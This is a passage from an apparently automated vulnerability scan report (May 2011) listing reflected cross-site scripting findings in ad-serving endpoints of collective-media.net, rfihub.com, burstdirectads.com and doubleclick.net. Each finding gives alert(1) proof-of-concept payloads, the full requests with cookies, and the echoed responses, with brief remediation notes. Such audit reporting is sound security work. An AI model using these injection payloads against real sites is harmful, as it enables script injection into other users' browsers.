<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-9391291_1305127945","http://ad.doubleclick.net/adj/edh.mayoclinicd232a'-alert(1)-'a44c4f88b6b/eyevision/general;net=wfm;u=,wfm-9391291_1305127945,11f8f328940989e,health,wfm.eye_h-wfm.health_m-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;po
...[SNIP]...

5.32. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc25d'-alert(1)-'7300cfcafc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevisionfc25d'-alert(1)-'7300cfcafc6/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:28 GMT
Connection: close
Content-Length: 7574

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-95279685_1305127948","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevisionfc25d'-alert(1)-'7300cfcafc6/general;net=wfm;u=,wfm-95279685_1305127948,11f8f328940989e,health,wfm.eye_h-wfm.health_h-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc
...[SNIP]...

5.33. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6febe'-alert(1)-'b4a4cfac885 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevision/general6febe'-alert(1)-'b4a4cfac885;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:34 GMT
Connection: close
Content-Length: 7574

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-44317774_1305127954","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general6febe'-alert(1)-'b4a4cfac885;net=wfm;u=,wfm-44317774_1305127954,11f8f328940989e,health,wfm.eye_h-wfm.health_h-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=ma
...[SNIP]...

5.34. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cmn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51345'-alert(1)-'37ca1051e8 was submitted in the cmn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevision/general;cmn=51345'-alert(1)-'37ca1051e8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:31:41 GMT
Connection: close
Content-Length: 7367

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("51345'-alert(1)-'37ca1051e8-78903454_1305127901","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general;net=51345'-alert(1)-'37ca1051e8;u=,51345'-alert(1)-'37ca1051e8-78903454_1305127901,11f8f328940989e,eye,cm.ent_h-cm.
...[SNIP]...

5.35. http://a.rfihub.com/sed [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7522e'><script>alert(1)</script>d7a9350e38a was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre12618848990257522e'><script>alert(1)</script>d7a9350e38a&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303843609359; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; b="aABIhmEmw==AC82AAABL5OfFng="; m="aAfF9qeBw==AE1783AAABL5OfFng=AE1783AAABL5Oe3qQ=AE1783AAABL5OevDE=AE1783AAABL5OelY0=AE1783AAABL5MlI5I=AE1783AAABL5Mk1HE=AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABI4fchw==AI89bBrQ==AAABL5OfFng="; f="aAD1r1M1A==AK1303843590AB7AAABL5OfFnc=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aAEHEoXNA==AHnca1783AN1303150295000AAABL5OfFnc=AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABn_lxFg==BCaEZNfFOGPDzez|13892|65039|1035756|18121|1077|101708|445|43482|8678AAABL9-72GU=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: u="aABunwHQQ==AI89bBrQ==AAABL9-72GQ=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: c="aAGiDjz5Q==AFd1077AB1AAABL9-72GM=AFv2215AB1AAABL9-72GM=AGu15540AB1AAABL9-72GM=AGt15540AB1AAABL9-72GM=AGb13892AB1AAABL9-72GM=AGa13892AB1AAABL9-72GM=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: f="aAE7EpWsg==AK1305128720AB1AAABL9-72GM=AK1303843590AB7AAABL5OfFnc=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: s="aACna-YHw==AE9479AN1294103956000AAABL9-72GM=AE8438AN1275963655000AAABL9-72GM=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Content-Length: 2526

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305128720483;click=http://a.rfihub.com/aci/127_1_YWE9
...[SNIP]...
rder=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12386&aa=13892,65039,18121,1035756,1077,15540,EZNfFOGPDzez,http%3A%2F%2Frocketfuelinc.com,760,2215,43482,2408,8678&pa=ppre12618848990257522e'><script>alert(1)</script>d7a9350e38a&id=&ra=1287204850.16913393858911707'>
...[SNIP]...

5.36. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b7e6"-alert(1)-"d39b8a68305 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1858209&bur=50493&x=http://www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS=2jBZy.S7nc/SZ=300X250A/V=2.3S//ST=0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL=&8b7e6"-alert(1)-"d39b8a68305=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:37 GMT
Pragma: no-cache
Content-Length: 5263
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.burstdirectads.com/imp?8b7e6"-alert(1)-"d39b8a68305=1&Z=300x250&bur=50493&s=1858209&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad21832a%2dmap.cgi%2fBCPG175222.253833.315920%2fVTS%3d2jBZy.S7nc%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Qxi0i9J10y61Gbc47hgYD2%5f
...[SNIP]...

5.37. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5f25"><script>alert(1)</script>28bbbb090e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1858209&bur=50493&x=http://www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS=2jBZy.S7nc/SZ=300X250A/V=2.3S//ST=0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL=&c5f25"><script>alert(1)</script>28bbbb090e1=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:35 GMT
Pragma: no-cache
Content-Length: 5308
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.burstdirectads.com/imageclick?Z=300x250&bur=50493&c5f25"><script>alert(1)</script>28bbbb090e1=1&s=1858209&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad21832a%2dmap.cgi%2fBCPG175222.253833.315920%2fVTS%3d2jBZy.S7nc%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Qxi0i9J10y61Gbc47hgYD2%5f3S02vc02vc%2fREDIRUR
...[SNIP]...

5.38. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dd5a"-alert(1)-"f08a47bece6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX&6dd5a"-alert(1)-"f08a47bece6=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:47:08 GMT
Content-Length: 5934

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 10:16:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B42128446/42146233/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX&6dd5a"-alert(1)-"f08a47bece6=1http%3a%2f%2fwww.zumba.com/shop");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW
...[SNIP]...

5.39. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1712"-alert(1)-"7d741984828 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYXd1712"-alert(1)-"7d741984828 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:45:52 GMT
Content-Length: 5904

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 10:16:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
00%3B42128446/42146233/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYXd1712"-alert(1)-"7d741984828http://www.zumba.com/shop");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
v
...[SNIP]...

5.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12bd2"-alert(1)-"84fa1176aee was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

